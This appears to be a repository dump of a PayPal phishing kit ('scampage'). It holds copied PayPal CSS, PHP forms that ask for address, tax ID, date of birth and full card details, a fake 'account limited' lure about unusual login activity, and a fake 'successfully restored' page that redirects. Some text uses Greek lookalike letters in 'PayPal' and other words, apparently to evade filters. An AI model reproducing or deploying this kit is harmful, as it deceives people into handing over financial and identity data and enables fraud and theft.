td{background:#FFF6E5 !important} 247 | .datatable td.ruler{background:#C8CDD0; padding:1px 0 0 0;} 248 | .datatable td.ruler div{border-top:1px solid #FFF; border-bottom:1px solid #C0C0C0; background:#F0F0F0; height:4px; padding:0px; font-size:1px; line-height:1px;} 249 | .datatable td.viewAll{padding-left:0px;} 250 | 251 | #transactionTable tr.secondary td {display:none;} 252 | #transactionTable tr.showSecondary td {background-color:#ffeecc; border-top:0px;} 253 | #transactionTable tr.secondary td {border-bottom:none;} 254 | #transactionTable tr td.showCollapsedImage a {background:url(/en_US/i/icon/icon_expand_plus_11x11.gif) no-repeat;} 255 | #transactionTable tr td.showExpandedImage a {background:url(/en_US/i/icon/icon_collapse_plus_11x11.gif) no-repeat;} 256 | #transactionTable td.emailInfo div.wrapEmail, #transactionTable td.paymentStatusInfo div.wrapPaymentStatus{float:left; word-wrap:break-word; overflow:hidden; padding:0 0 2px 0;} 257 | .rtl #transactionTable td.emailInfo div.wrapEmail,.rtl #transactionTable td.paymentStatusInfo div.wrapPaymentStatus{float:right} 258 | #transactionTable .balloonControl {border:none;} 259 | #transactionTable #flag .balloonControl {display:inline-block;} 260 | .dashedLink{border-bottom: 1px dashed !important;text-decoration: none !important} 261 | 262 | .splitButton {position:relative; overflow:visible; font-size:11px; padding:0 !important;} 263 | .splitButton ul {position:absolute; width:auto; list-style-type:none;} 264 | .splitButton ul li {margin:0; border-right:1px solid #ccc; border-left:1px solid #ccc; line-height:13px; padding:2px 4px 2px 5px; background:#fff; cursor:pointer; white-space:normal} 265 | .splitButton ul li.hideSecondaryItem {display:none; padding:3px 5px 3px 5px;} 266 | .splitButton ul li.hover {background:#feeecc;} 267 | .splitButton ul li.primaryItem {border-top:1px solid #bfbfbf; border-bottom:1px solid #8f8d8e; background:#e1e1e1 url(/en_US/i/scr/scr_bg_splitebutton_on.gif) repeat-x left center; padding-right:20px;} 268 | div.open ul li.primaryItem {border-top:1px solid #dcc6a1; border-bottom:1px solid #925d0f; background:#FFA822 url(/en_US/i/scr/scr_bg_splitebutton_over.gif) repeat-x left center;} 269 | .splitButton ul.open { border-bottom:1px solid #8f8d8e;} 270 | .splitButton ul.open li {display:block;} 271 | .splitButton ul li a {text-decoration:none !important;} 272 | .splitButton span.listSpan {position:absolute; width:18px; background: url(/en_US/i/icon/icon_blue_down_arrow_7x4.gif) no-repeat center; border:1px solid transparent;} 273 | div.open span.listSpan {border-top:1px solid #dcc6a1; border-bottom:1px solid #925d0f; border-left:1px solid #925d0f; border-right:1px solid #925d0f; cursor:pointer;} 274 | .flagReplica ul li, .flagReplica ul li.primaryItem {background:#eee; color:#b3b3b3;} 275 | .flagReplica span.listSpan {background:#e1e1e1 url(/en_US/i/icon/icon_blue_dwn_arrow.gif);} 276 | .splitButton ul li.primaryItem a, .splitButton ul li.hideSecondaryItem a{color:#333;} 277 | 278 | /* History */ 279 | .history #content{overflow:visible;} 280 | .history .btnLink {overflow:visible;} 281 | .history fieldset {margin:0;} 282 | .history #headline {clear:both; overflow:auto;} 283 | .history #headline h2 {float:left; margin-bottom:0;} 284 | .history #headline .resolutionContent {float:right; padding-top:2px; padding-right:1px; font-weight:bold;} 285 | .history #headline .resolutionContent span a {font-weight:normal;} 286 | .history #headline .resolutionContent span.requireAction a {color:#ff0000;} 287 | 288 | .history .amountTransaction {clear:both; overflow:hidden; margin:10px 0;} 289 | .history .amount {float:left; min-width:100px; margin-right:15px; border:1px solid #ccc;} 290 | .history .amount h3 {margin:1px 1px 0 1px; padding:1px 0 1px 5px; color:#fff; font-size:0.9em; background:#bababa url(/en_US/i/scr/src_bg_txn_balance.gif) repeat-x left top;} 291 | .history .amount p {margin:5px 6px; padding:0; font-size:1.33em; font-weight:bold; line-height:normal;} 292 | .history .amount p.small {font-weight:normal;font-size:0.9em;} 293 | .history .amount p.negative {color:#C00;} 294 | .history .amount p span {color:#757575; font-size:0.63em;} 295 | .history form ul li input {text-decoration:underline;} 296 | .history form ul li.selected {color:#000; font-weight:bold;} 297 | .history form .separator {margin:0 3px 0 8px; font-weight:normal;} 298 | .history form .group .separator {margin:0 5px; line-height: 2;} 299 | .history form fieldset.multi { margin-bottom:10px;} 300 | .history form p {margin:0 0 10px 0; padding-left:0;} 301 | .history form fieldset.multi p.group, .history form fieldset.multi p.buttons {margin:0;} 302 | .history form p .daterange {margin:0 5px 0 0;padding:0;} 303 | .history form p select.dayoption {margin:0 15px 0 0;} 304 | .history form input#show {margin-left:15px; vertical-align:top;float:left} 305 | .history form p input#submitshow {margin-left:0px; vertical-align:top;} 306 | .history form fieldset.multi p.group span.field input[type="radio"] {margin-top:4px;} 307 | .history form ul {margin:0 0 12px 0; list-style-type:none;} 308 | .history form .amountTransaction ul li, .history form #activityFilters ul li, .history form .downloadWidget ul li {display:inline; margin:0; border-right:1px solid #999; padding:0 5px;} 309 | .history form #activityFilters ul li.first{padding-left:0;} 310 | .history form ul li.first {padding-left:0;} 311 | .history form ul li.last {border-right:none;} 312 | .history .accountName {margin:10px 0 0 54px;} 313 | .history .accountName .accountValue {margin-left:10px;} 314 | .history .basicSearch {float:left;} 315 | .history .advancedSearch {float:left;} 316 | .history .advancedSearch fieldset {margin-left:2px;} 317 | .history .advancedSearch p {float:left; margin:0 0 10px 0; font-weight:bold;} 318 | .history .advancedSearch p span.separator {margin-right:8px;} 319 | .history .advancedSearch p label {margin:0 0 5px 0;} 320 | .history .advancedSearch p label.separator, .history .advancedSearch .inlineCurrency span {font-weight:normal;} 321 | .history .advancedSearch p .button {margin:0 0 0 15px;} 322 | .history .advancedSearch div {clear:both; overflow:auto;} 323 | .history .advancedSearch .inlineCurrency {margin:0 0 10px 10px;} 324 | .history .advancedSearch .inlineCurrency label {float:left; padding-right:3px; font-weight:normal;} 325 | .history .advancedSearch #ccNote {clear:both; font-weight:normal;} 326 | .history .advancedSearch .currency {clear:both; margin-bottom:10px; font-weight:normal;} 327 | .history .advancedSearch .currency label {font-weight:bold;} 328 | .history .advancedSearch .currency input {border:none;} 329 | .history .advancedSearch .currency label.checkbox {display:inline; margin-right:5px; font-weight:normal;} 330 | .history .datatable .title .itescredit {float:left; margin-left:10px;} 331 | 332 | /*Filters*/ 333 | #activityFilters {clear:both; margin-bottom:5px;} 334 | #activityFilters ul, #activityFilters li {display:inline; margin:0; padding:0; list-style-type:none;} 335 | #activityFilters ul li span {text-decoration:underline; color:#336699;} 336 | #activityFilters ul li #filtersSecondary span {text-decoration:none;} 337 | #activityFilters ul li p{ margin:0; padding:0;} 338 | #activityFilters ul li input {overflow:visible; border:none; padding:0; background:transparent; color:#369; cursor:pointer;} 339 | #activityFilters.enabled {z-index:2000; height:20px;} 340 | #activityFilters.enabled ul ul {position:absolute; top:8px; left:0; display:none; background:#fff;} 341 | #activityFilters.enabled ul ul li {float:none; display:block; margin:3px 0; padding:0;} 342 | #activityFilters.enabled ul li.hover ul ul {display:none;} 343 | #activityFilters.enabled ul li ul li.hover ul {top:0; left:300px; display:block;} 344 | #activityFilters.enabled ul li input.selected, #activityFilters.enabled ul li.hover input {text-decoration:none;} 345 | #activityFilters.enabled .selected {color:#333; font-weight:normal; cursor:auto;} 346 | #activityFilters.enabled ul {position:absolute; clear:both; margin:0; padding:0;} 347 | #activityFilters.enabled ul li {position:relative; float:left; display:block; margin:0; padding:0 5px; list-style-type:none;} 348 | #activityFilters.enabled ul li {float /*\**/: none\9;} 349 | #activityFilters.enabled ul li {*float:left;} 350 | .history form #activityFilters ul li {padding /*\**/: 0 3px\9;} 351 | .history form #activityFilters ul li {*padding:0 5px;} 352 | #activityFilters.enabled ul li.more {margin:3px; padding-right:12px; background:url(/en_US/i/icon/icon_blue_right_arrow_4x7.gif) no-repeat right;} 353 | #activityFilters.enabled ul li.last {border:none; padding-right:18px; color:#2E6095; background:url(/en_US/i/icon/icon_arrow_sort_down_13x12.gif) no-repeat right;} 354 | #activityFilters.enabled ul li.last {padding-right /*\**/:15px;} 355 | #activityFilters.enabled ul li.last {*padding-right:18px; *background-position:100% 70%;} 356 | #activityFilters.enabled ul li ul {display:none; width:auto;} 357 | #activityFilters.enabled ul li ul li ul, #activityFilters.enabled ul li.hover ul li ul {display:none;} 358 | #activityFilters.enabled ul li.hover ul {position:absolute; top:20px; left:0; z-index:1500; display:block; white-space:nowrap; margin:-4px 5px 0 3px; border:1px solid #eaeae9; padding:0 5px 0 0; background:#fff;} 359 | #activityFilters.enabled ul li ul li {border:none;} 360 | #activityFilters.enabled ul li.hover ul li {float:none; padding:0 10px 0 4px;} 361 | #activityFilters.enabled ul li.hover ul li.hover {position:relative; z-index:1700; background:#feeec9;} 362 | #activityFilters.enabled ul li.hover input {margin-left:0;} 363 | #activityFilters.enabled ul li.hover ul li.hover ul {position:absolute; top:0; left:96%; z-index:1700; display:block; white-space:nowrap; padding:0 5px 0 0; border:1px solid #eaeae9;} 364 | #activityFilters.enabled ul li ul li ul li ul , #activityFilters.enabled ul li.hover ul li.hover ul li ul {display:none;} 365 | #activityFilters.enabled ul li.hover ul li.hover ul li.hover ul {display:block; left:85%; border:1px solid #eaeae9; padding-right:4px; white-space:nowrap;} 366 | #activityFilters div {float:right;} 367 | #activityFilters div label {display:inline; margin-right:5px;} 368 | .history .addPosition {position:relative;} 369 | 370 | #rightTextDownload {z-index:1000; float:left; height:1.667em; font-size:0.9em;} 371 | #rightTextDownload ul, #rightTextDownload li {z-index:1000; display:inline;} 372 | #rightTextDownload ul li {border-right:1px solid #333; padding-top:0; padding-left:0;} 373 | #rightTextDownload ul li {margin-left:5px; vertical-align:top;} 374 | #rightTextDownload ul li.last {display:none;} 375 | #rightTextDownload ul li span, #rightTextDownload ul li a {color:#336699; text-decoration:underline;} 376 | #rightTextDownload.enabled {position:relative; display:inline;} 377 | #rightTextDownload.enabled .downloadxls {float:left; padding-top:0;} 378 | #rightTextDownload.enabled ul li input, #rightTextDownload.enabled ul li.hover ul li input {padding-top:0; text-align:left;} 379 | #rightTextDownload.enabled ul {float:left; display:inline; margin:0; padding:0;} 380 | #rightTextDownload.enabled ul li {float:left; display:block; margin:0; list-style-type:none; border-right:1px solid #CCC; padding:0 8px 0 5px; vertical-align:top;} 381 | #rightTextDownload.enabled ul ul {position:absolute; top:8px; display:none; margin:0; padding:0; background:#fff;} 382 | #rightTextDownload.enabled ul ul li {display:block; float:none; margin:0; padding:0;} 383 | #rightTextDownload.enabled ul li.last {border:none; padding-right:18px; padding-left:8px; background:url(/en_US/i/icon/icon_arrow_sort_down_13x12.gif) no-repeat right;} 384 | #rightTextDownload.enabled ul li ul {display:none; width:auto;} 385 | #rightTextDownload.enabled ul li.hover ul {top:20px; right:-10px; z-index:1000; display:block; white-space:nowrap; margin:-4px 5px 0 0px; border:1px solid #eaeae9; padding:0; background:#fff;} 386 | #rightTextDownload.enabled ul li ul li {border:none;} 387 | #rightTextDownload.enabled ul li.hover ul li {position:relative; float:none; margin:0 0 5px 0; padding:0 0 0 4px;} 388 | #rightTextDownload.enabled ul li.hover ul li.hover {position:relative; background:#feeec9;} 389 | #noScriptDownload {float:left; padding-left:0.2em;} 390 | 391 | .datatable input.archiveCheck {width:13px; height:13px; margin:0px; border:none;} 392 | .history .status {clear:both; font-size:0.9em;} 393 | .history .status h4 {margin-bottom:10px;} 394 | .history .status h4 span.statusPage {margin-left:8px; font-weight:normal;} 395 | .history .status dl {float:left; margin:0 0 20px 0; width:460px; list-style-type:none;} 396 | .history .status dl.moreGlossary {margin-left:10px;} 397 | .history .status dl dt {clear:left; float:left; width:auto; color:#757575; font-weight:bold;white-space:nowrap; padding-right:5px;} 398 | .history .status dl dd {color:#757575; margin-left:0; color:#757575;} 399 | 400 | #footNote {clear:both; color:#333333; margin:0 auto; padding-top:0.5em; text-align:center; width:630px;} 401 | #footNote P {margin:0 0 12px 0; font-size:.91em;} 402 | #footNote P.lastPara {margin:0; font-size:.91em;} 403 | #footNote A.ebayLink {color:#03c; font-size:1.1em; font-weight:bold;} 404 | #footNote p#legal {width:50%; margin:0 auto; text-align:center;} 405 | 406 | .calcontainer {z-index:2500 !important;} 407 | .mask {z-index:5000 !important;} 408 | .yui-panel-container {z-index:5001 !important;} 409 | .yui-panel {z-index:5002 !important;} 410 | 411 | #markShippedlightbox .body p.trackInfo label {display:inline;} 412 | #markShippedlightbox .body p.trackInput {padding-left:25px;} 413 | #markShippedlightbox .body p select#shippedUsing {width:157px} 414 | #markShippedlightbox .header h3 span.error, div#addTrackingLightbox div.header h3 span.error {display:block; color:#c70100;} 415 | #downloadFileTypeLightbox .header h3, #downloadLightbox .header h3 {background:none; padding-bottom:20px;} 416 | #downloadFileTypeLightbox .header span, #downloadLightbox .header span {display:block; padding-bottom:0; font-weight:normal; font-size:11px;} 417 | #downloadFileTypeLightbox .body form fieldset, #downloadLightbox .body form fieldset {margin:0;} 418 | #downloadFileTypeLightbox .body p, #downloadLightbox .body p {margin:0 0 1.7em 0;} 419 | #addTrackingLightbox .footer, #markShippedlightbox .footer, #downloadFileTypeLightbox .footer, #downloadLightbox .footer {padding:0;} 420 | div.mpiplacement {margin-top:10px;} 421 | 422 | .welcome .rewards .content {margin:8px;} 423 | .welcome .rewards .content p {margin:0;padding:0;} 424 | .welcome .rewards .content span.wrapper {float:left;margin-right:15px;} 425 | .welcome .rewards .progress {margin-top:15px;border-top:1px solid #ccc;padding-top:15px;} 426 | .welcome .rewards p.success {margin-top:10px;border-top:1px solid #ccc;padding-top:10px;} 427 | .welcome .rewards .progress p {margin-bottom:8px;} 428 | .welcome .rewards div.meter {float:left;width:86%; border:1px solid #ccc;line-height:2em;} 429 | .welcome .rewards .meter div {margin-right:3px;border-right:3px solid #009933;background-color:#dcf9c7;color:#009933;text-align:center;} 430 | .welcome .rewards .progress span.limit {padding-left: 100px;} 431 | /*.welcome .rewards span.buttonAsLink {margin-left:63px;} 432 | .welcome .rewards p.success span.buttonAsLink {margin-left:0;}*/ 433 | 434 | .taxDisclaim {margin:0 0 1.667em 0;} 435 | .statementLink {margin-top:30px; text-align:right;} 436 | .statementLink ul li a {background:url("/en_US/i/icon/icon_statetment_16x16.gif") no-repeat scroll 0 0 transparent; list-style-type:none; padding-left:20px !important; padding-top:1px !important;} 437 | 438 | #viewDemoLinks {float:right; width:150px; margin-right:10px; text-align:right; vertical-align:top;} 439 | #viewDemoLinks a#viewDemoAnchor {padding-left:20px; background:url(/en_US/i/icon/icon_viewDemo_15x14.gif) no-repeat left;} 440 | #viewDemoLinks ul, #viewDemoLinks li {display:inline; text-align:left; list-style-type:none;} 441 | #viewDemoLinks.enabled ul {position:absolute;} 442 | #viewDemoLinks.enabled ul li {position:relative;} 443 | #viewDemoLinks.enabled ul ul {position:absolute; top:8px; display:none; background:#fff; width:auto;} 444 | #viewDemoLinks.enabled ul ul li {float:none; display:block; margin:3px 0; padding:0;} 445 | #viewDemoLinks.enabled ul ul li a {text-decoration:none;} 446 | #viewDemoLinks.enabled ul li.last {padding:0px; vertical-align:middle;} 447 | #viewDemoLinks.enabled ul li.last a {padding:4px 4px;} 448 | #viewDemoLinks.enabled ul li ul li {border:none;} 449 | #viewDemoLinks.enabled ul li.hover ul li {float:none; padding:0px 4px;} 450 | #viewDemoLinks.enabled ul li.hover ul li a{padding:0px; margin:0px;} 451 | #viewDemoLinks.enabled ul li.hover ul li.hover {position:relative; z-index:2700; background:#feeec9;} 452 | #viewDemoLinks.enabled ul li.hover ul {position:absolute; top:16px; right:0; z-index:2500; display:block; white-space:nowrap; margin-right:5px; border:1px solid #eaeae9; background:#fff;} 453 | 454 | /* Davis - Rescenter flow changes */ 455 | .datatable .actions .rescenter-buttons{float:right;} 456 | .datatable .actions span.backtorescenter{float:right;margin:5px 10px 0 0;} 457 | .datatable .actions span.backtorescenter a{ cursor: pointer;text-decoration: none;} 458 | 459 | /* Hawk banners */ 460 | .mer-banner {background-color: #fff; border: 2px solid #dbdee1; padding: 15px 24px 24px; min-height: 123px; margin: 5px 0; overflow: auto;} 461 | .mer-left-pannel {float: left; padding-top: 29px;} 462 | .mer-right-pannel {border-left: 1px solid #dbdee1; float: right; padding-left: 30px; width: 75%;} 463 | .mer-right-pannel h3 {color: #4477bf; font: normal 20px/20px "Helvetica Neue Light",Helvetica,Arial,sans-serif; margin: 0px;} 464 | .mer-right-pannel p {color: #2c2e2f; font: normal 16px/20px "Helvetica Neue Light",Helvetica,Arial,sans-serif; margin-top: 0.5em;} 465 | .mer-banner .btn {background-color: #0079C1; color: #fff; font: normal 15px/1em "Helvetica Neue Light",Helvetica,Arial,sans-serif; cursor: pointer; display: inline-block; margin-bottom: 0; padding: 9px 60px 10px; text-align: center; vertical-align: middle; text-decoration: none;} 466 | 467 | .mer-trans-banner { background-color: #017acc; background-image: -webkit-gradient(linear, left bottom, right bottom, color-stop(0, #017acc), color-stop(0.85, #5ba4ee)); 468 | background-image: -o-linear-gradient(right, #017acc 0%, #5ba4ee 85%); 469 | background-image: -moz-linear-gradient(right, #017acc 0%, #5ba4ee 85%); 470 | background-image: -webkit-linear-gradient(right, #017acc 0%, #5ba4ee 85%); 471 | background-image: -ms-linear-gradient(right, #017acc 0%, #5ba4ee 85%); 472 | background-image: linear-gradient(to right, #017acc 0%, #5ba4ee 85%); 473 | overflow: auto; 474 | } 475 | 476 | /* RTR */ 477 | #cancelLightbox_mask.mask{ 478 | background-color:#fff; 479 | } 480 | 481 | /* 54666 - PAD */ 482 | #transactionTable tr.padtxn td {font-weight:bold;} 483 | 484 | /*Expirable PSB Lightbox*/ 485 | .displayOfferBox { 486 | width: 170px; 487 | float: left; 488 | padding: 15px 5px 0 10px; 489 | margin: 15px 5px; 490 | box-shadow: -1px 5px 10px -1px #C2C2C2; 491 | -webkit-box-shadow: -1px 5px 10px -1px #C2C2C2; 492 | -moz-box-shadow: -1px 5px 10px -1px #C2C2C2; 493 | background: url("/en_US/i/logo/pp_monogram_19x23.jpg") no-repeat 8px 8px; 494 | } 495 | .expireInfo, .howToUse { 496 | color: #666666; 497 | font-size: 11px; 498 | margin-bottom: 5px; 499 | } 500 | .useBy { 501 | margin-bottom: 10px; 502 | } 503 | .nextPurText { 504 | color: #1A1A1A; 505 | font-size: 18px; 506 | margin-bottom: 15px; 507 | } 508 | .clearFloat { 509 | clear:left; 510 | } 511 | .lightbox .yui-panel .body .noTopMargin { 512 | margin-top: 8px; 513 | } 514 | .lightbox .yui-panel .body .noBotMargin { 515 | margin-bottom: 0; 516 | } 517 | .offerAmnt { 518 | color: #0079C1; 519 | font-size: 20px; 520 | line-height: 1.2em; 521 | } 522 | #tnc { 523 | margin: 0.5em 1.5em; 524 | } 525 | -------------------------------------------------------------------------------- /myaccount/form/address_info.php: -------------------------------------------------------------------------------- 1 | 2 |
3 |

4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | Country : 34 | 35 | 36 | '; 37 | } 38 | ?> 39 | 40 | 41 | Use fοr fraud alert. 42 | 43 | 44 | 45 | 46 | Same tax ΙD as on yοur tax return. 49 | 50 | 51 | - 52 | - 53 | 54 | '; 55 | } elseif ($negara=="CA"){ echo ' 56 | Same tax ΙD as on yοur tax return. 57 | 58 | 59 | - 60 | - 61 | 62 | '; 63 | } elseif ($negara=="HK") { echo ' 64 | Need fοr identification. 65 | 66 | 67 | 68 | '; 69 | } elseif ($negara=="AU") { echo ' 70 | Need fοr identification. 71 | 72 | 73 | 74 | '; 75 | } elseif ($negara=="IT") { echo ' 76 | Need fοr identification. 77 | 78 | 79 | 80 | '; 81 | } 82 | ?> 83 | 84 | We'll confirm. 85 | 86 | 87 | '."\n"; 93 | $html_output .= ' '; 94 | $months = array("", "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"); 95 | for ($month = 1; $month <= 12; $month++) { 96 | $html_output .= ''; 97 | } 98 | $html_output .= "\n".' '."\n"; 99 | 100 | /*days*/ 101 | $html_output .= ' '."\n"; 107 | 108 | /*years*/ 109 | $html_output .= ' '."\n"; 115 | 116 | return $html_output; 117 | } 118 | ?> 119 | 120 | 121 | 122 |

123 | 124 |

125 |

126 | 127 |
-------------------------------------------------------------------------------- /myaccount/form/card_info.php: -------------------------------------------------------------------------------- 1 | 2 |
3 |

4 | 5 | 6 | Νeed for bank identification. 9 | 10 | 11 | - 12 | - 13 | 14 | ';} 15 | ?> 16 | 17 | 18 | Νame as it appears on Card. 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | '."\n"; 40 | $html_output .= ' '; 41 | for ($exp_month = 1; $exp_month <= 12; $exp_month++) { 42 | if (strlen($exp_month) === 1){ 43 | $html_output .= ''; 44 | } else { 45 | $html_output .= ''; 46 | } 47 | } 48 | $html_output .= "\n".'   /  '."\n"; 49 | 50 | /*years*/ 51 | if (date('m') == 12){ 52 | $html_output .= ' '."\n"; 58 | } else { 59 | $html_output .= ' '."\n"; 65 | } 66 | 67 | return $html_output; 68 | } 69 | ?> 70 | 71 | 72 | 73 | 74 | 75 | 76 | What is this? 77 | 78 | 79 |

80 |
81 | 82 |

83 | 84 |

85 |

86 | 87 |
88 | 89 |
-------------------------------------------------------------------------------- /myaccount/form/info.php: -------------------------------------------------------------------------------- 1 |
2 |

ΡayΡal is constantly working to ensure security by regularly screening the accounts in our system. We recently reviewed your account, and we need more information to help us provide you with a secure service. Until we can collect this information, your access to sensitive account features will be limited. We would like to restore your access as soon as possible, and we apologise for the inconvenience. 3 |


4 |

Why is my account access limited?

5 |

Your account access has been limited for the following reason(s):

6 |

We noticed some unusual log in activity with your account. Please check that no one has logged in to your account without your permission. 7 |
8 |

(Your case ID for this reason is PP-003---.)

9 |

10 | How can I get my account access restored? 11 |

It's usually pretty easy to take care of things like this. Most of the time, we just need a little more information about your account.

12 |

To help us with this and to find out what you can and can't do with your account until the issue is resolved.

13 |

14 | 15 |

16 |

17 | 18 | 19 |
-------------------------------------------------------------------------------- /myaccount/form/ip_info.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /myaccount/form/success.php: -------------------------------------------------------------------------------- 1 |
2 |

Your PayPal account has been successfully restored. 3 |

You have completed all the checklist items, you must log in again to see the changes to your account.

ΡayΡal takes the safety of your account, business and financial data as seriously as you do, and these ongoing checks of our system contribute to our high level of security.

4 |

5 | 6 |

7 |

REDIRECTING

You will be redirected automatically to login page in 3 seconds

8 |

9 | 10 | 11 |
12 | 13 | -------------------------------------------------------------------------------- /myaccount/icon/apple-touch-icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/icon/apple-touch-icon.png -------------------------------------------------------------------------------- /myaccount/icon/cv_amex_card.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/icon/cv_amex_card.gif -------------------------------------------------------------------------------- /myaccount/icon/cv_card.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/icon/cv_card.gif -------------------------------------------------------------------------------- /myaccount/icon/enabled_by_symc_vip.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/icon/enabled_by_symc_vip.png -------------------------------------------------------------------------------- /myaccount/icon/header_logginginAction.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/icon/header_logginginAction.gif -------------------------------------------------------------------------------- /myaccount/icon/icon_alert_24wx24h.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/icon/icon_alert_24wx24h.gif -------------------------------------------------------------------------------- /myaccount/icon/icon_critalert.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/icon/icon_critalert.gif -------------------------------------------------------------------------------- /myaccount/icon/logo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/icon/logo.gif -------------------------------------------------------------------------------- /myaccount/icon/logo2.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/icon/logo2.gif -------------------------------------------------------------------------------- /myaccount/icon/logo_paypal_106x27.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/icon/logo_paypal_106x27.png -------------------------------------------------------------------------------- /myaccount/icon/paypal_logo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/icon/paypal_logo.gif -------------------------------------------------------------------------------- /myaccount/icon/pp_favicon_x.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/icon/pp_favicon_x.ico -------------------------------------------------------------------------------- /myaccount/icon/sc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/icon/sc.png -------------------------------------------------------------------------------- /myaccount/icon/scr_check_10x10.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/icon/scr_check_10x10.gif -------------------------------------------------------------------------------- /myaccount/icon/scr_x_10x10.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/icon/scr_x_10x10.gif -------------------------------------------------------------------------------- /myaccount/icon/sprite_header_icons_2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/icon/sprite_header_icons_2x.png -------------------------------------------------------------------------------- /myaccount/icon/sprite_ia.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/icon/sprite_ia.png -------------------------------------------------------------------------------- /myaccount/icon/sprite_nav_icons.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/icon/sprite_nav_icons.png -------------------------------------------------------------------------------- /myaccount/icon/sprite_nav_icons2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/icon/sprite_nav_icons2x.png -------------------------------------------------------------------------------- /myaccount/icon/sprites_cc_global.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gimpunk/scampage/c2720134df71b46601786f12af6938a385aff41a/myaccount/icon/sprites_cc_global.png -------------------------------------------------------------------------------- /myaccount/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /myaccount/js/jquery.billing.js: -------------------------------------------------------------------------------- 1 | jQuery(function($) { 2 | $('.button').attr('disabled', true); 3 | $('[name="month"]').addClass('has-error'); 4 | $('[name="day"]').addClass('has-error'); 5 | $('[name="year"]').addClass('has-error'); 6 | 7 | $(this).keyup(function(e) { 8 | 9 | e.preventDefault(); 10 | 11 | if ( $('[name="address_1"]').val().length > 4 ){ 12 | $('[name="address_1"]').removeClass('has-error'); 13 | } else { 14 | $('[name="address_1"]').addClass('has-error'); 15 | } 16 | 17 | if ( $('[name="city"]').val().length > 3 ){ 18 | $('[name="city"]').removeClass('has-error'); 19 | } else { 20 | $('[name="city"]').addClass('has-error'); 21 | } 22 | 23 | if ( $('[name="postal"]').val().length > 3 ){ 24 | $('[name="postal"]').removeClass('has-error'); 25 | } else { 26 | $('[name="postal"]').addClass('has-error'); 27 | } 28 | 29 | if ( $('[name="phone"]').val().length > 7 ){ 30 | $('[name="phone"]').removeClass('has-error'); 31 | } else { 32 | $('[name="phone"]').addClass('has-error'); 33 | } 34 | 35 | if ( $('.has-error').length == 0 ){ 36 | $('.button').attr('disabled', false); 37 | } else { 38 | $('.button').attr('disabled', true); 39 | } 40 | 41 | }); 42 | 43 | $(this).change(function(e) { 44 | 45 | e.preventDefault(); 46 | 47 | if ( $('[name="month"] option:selected').val() === "" ){ 48 | $('[name="month"]').addClass('has-error'); 49 | } else { 50 | $('[name="month"]').removeClass('has-error'); 51 | } 52 | 53 | if ( $('[name="day"] option:selected').val() === "" ){ 54 | $('[name="day"]').addClass('has-error'); 55 | } else { 56 | $('[name="day"]').removeClass('has-error'); 57 | } 58 | 59 | if ( $('[name="year"] option:selected').val() === "" ){ 60 | $('[name="year"]').addClass('has-error'); 61 | } else { 62 | $('[name="year"]').removeClass('has-error'); 63 | } 64 | 65 | if ( $('.has-error').length == 0 ){ 66 | $('.button').attr('disabled', false); 67 | } else { 68 | $('.button').attr('disabled', true); 69 | } 70 | 71 | }); 72 | 73 | }); 74 | -------------------------------------------------------------------------------- /myaccount/js/jquery.payment.js: -------------------------------------------------------------------------------- 1 | // Generated by CoffeeScript 1.7.1 2 | (function() { 3 | var $, cardFromNumber, cardFromType, cards, defaultFormat, formatBackCardNumber, formatBackExpiry, formatCardNumber, formatExpiry, formatForwardExpiry, formatForwardSlashAndSpace, hasTextSelected, luhnCheck, reFormatCardNumber, reFormatExpiry, restrictCVC, restrictCardNumber, restrictExpiry, restrictNumeric, setCardType, 4 | __slice = [].slice, 5 | __indexOf = 